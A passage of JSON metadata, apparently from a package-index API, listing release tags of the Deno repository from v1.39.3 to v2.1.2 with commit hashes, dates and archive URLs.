%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/